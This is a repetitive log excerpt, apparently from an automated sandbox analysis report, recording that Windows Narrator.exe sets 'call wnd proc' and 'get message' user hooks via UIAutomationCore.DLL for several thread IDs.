              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 5128 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 5128 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7132 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 4568 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
              Source: C:\Windows\System32\Narrator.exeWindows user hook set: 7712 get message C:\Windows\System32\UIAutomationCore.DLL
